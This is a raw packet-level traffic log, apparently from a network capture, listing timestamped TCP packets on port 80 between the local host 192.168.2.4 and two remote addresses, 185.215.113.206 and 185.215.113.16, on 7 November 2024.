Nov 7, 2024 04:12:22.718748093 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718753099 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718769073 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718787909 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718791008 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718806028 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718816996 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718844891 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718868971 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718894958 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718915939 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718931913 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718944073 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718955040 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718959093 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718966961 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718975067 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718986034 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718997002 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718997002 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719010115 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719013929 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719028950 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719059944 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719070911 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719084024 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719093084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719136953 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719166040 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719244003 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719248056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719259977 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719270945 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719329119 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719355106 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719367027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719377995 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719388962 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719397068 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719402075 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719412088 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719419003 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719424963 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719440937 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719443083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719458103 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719468117 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719472885 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719480991 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719511986 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719528913 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719607115 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719618082 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719630003 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719666004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719677925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719681978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719705105 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719729900 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719753981 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719803095 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719818115 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719821930 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719829082 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719855070 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719877958 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.719880104 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719938993 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719949007 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.719991922 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.720002890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.720015049 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.720036983 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.720156908 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.720191956 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.720206976 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.720221043 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.720232010 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.720252037 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.720257044 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.720278978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.720290899 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.720313072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.720330000 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.720341921 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:23.236500025 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:23.236582041 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:23.241436958 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:23.241451025 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:24.018444061 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:24.018619061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:24.069514036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:24.074472904 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:24.555279016 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:24.555327892 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:24.555342913 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:24.555355072 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:24.555367947 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:24.555378914 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:24.555408955 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:24.558048964 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:24.562891006 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:24.841010094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:24.841093063 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:24.852735043 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:24.857716084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:25.626311064 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:25.626383066 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:25.653570890 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:25.658535957 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:25.937624931 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:25.937874079 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:25.941760063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:25.946815968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:25.946887970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:25.947072029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:25.951828003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835122108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835135937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835144997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835155964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835165977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835176945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835195065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.835216999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.835253000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835263968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835273981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835289001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.835292101 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.835330009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.835339069 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.842113018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.842123985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.842133999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.842173100 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.842207909 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.986629009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.986643076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.986654043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.986665010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.986676931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.986715078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.986728907 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.986952066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.986999989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.987133026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.987149000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.987159967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.987169981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.987180948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.987191916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.987204075 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.987231970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.987843037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.987895012 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.988034964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.988045931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.988056898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.988079071 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.988107920 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.988820076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.988833904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.988846064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.988871098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.988897085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.989008904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.989018917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.989053965 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.993992090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.994007111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.994016886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.994048119 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.994076014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:26.994170904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:26.994220018 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.135577917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.135595083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.135601997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.135607004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.135691881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.135713100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.135715008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.135725975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.135736942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.135749102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.135778904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.135808945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.136315107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.136327982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.136341095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.136364937 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.136377096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.136388063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.136400938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.136401892 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.136435986 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.137139082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.137161970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.137173891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.137183905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.137206078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.137217999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.137223959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.137253046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.137679100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.137691021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.137702942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.137727022 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.137757063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.137792110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.137804031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.137814999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.137834072 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.137852907 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.138565063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.138586044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.138597965 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.138611078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.138645887 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.138711929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.138722897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.138734102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.138760090 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.138773918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.139614105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.139636040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.139650106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.139666080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.139666080 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.139678001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.139682055 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.139689922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.139694929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.139717102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.139725924 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.139759064 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.140415907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.140568018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.140580893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.140584946 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.140597105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.140608072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.140619993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.140635014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.140671968 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.141215086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.141236067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.141246080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.141268969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.141299963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286457062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286504030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286514044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286542892 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286570072 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286582947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286592960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286603928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286613941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286623001 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286624908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286634922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286649942 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286701918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286716938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286760092 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286818027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286833048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286853075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286855936 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286861897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286871910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286876917 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286881924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286891937 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286922932 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.286978006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286988974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.286998034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287019014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287034035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287045002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287045002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287055016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287072897 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287085056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287107944 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287136078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287303925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287319899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287332058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287358046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287363052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287364006 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287370920 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287378073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287388086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287400007 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287400961 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287417889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287419081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287434101 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287460089 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287666082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287718058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287719011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287734032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287755966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287770033 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287772894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287782907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287791967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287803888 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287810087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287821054 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287825108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287833929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.287848949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.287874937 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288021088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288060904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288063049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288074017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288105011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288122892 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288130045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288140059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288175106 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288189888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288206100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288216114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288227081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288237095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288247108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288247108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288281918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288291931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288487911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288505077 CET	80	49762	185.215.113.16	192.168.2.4
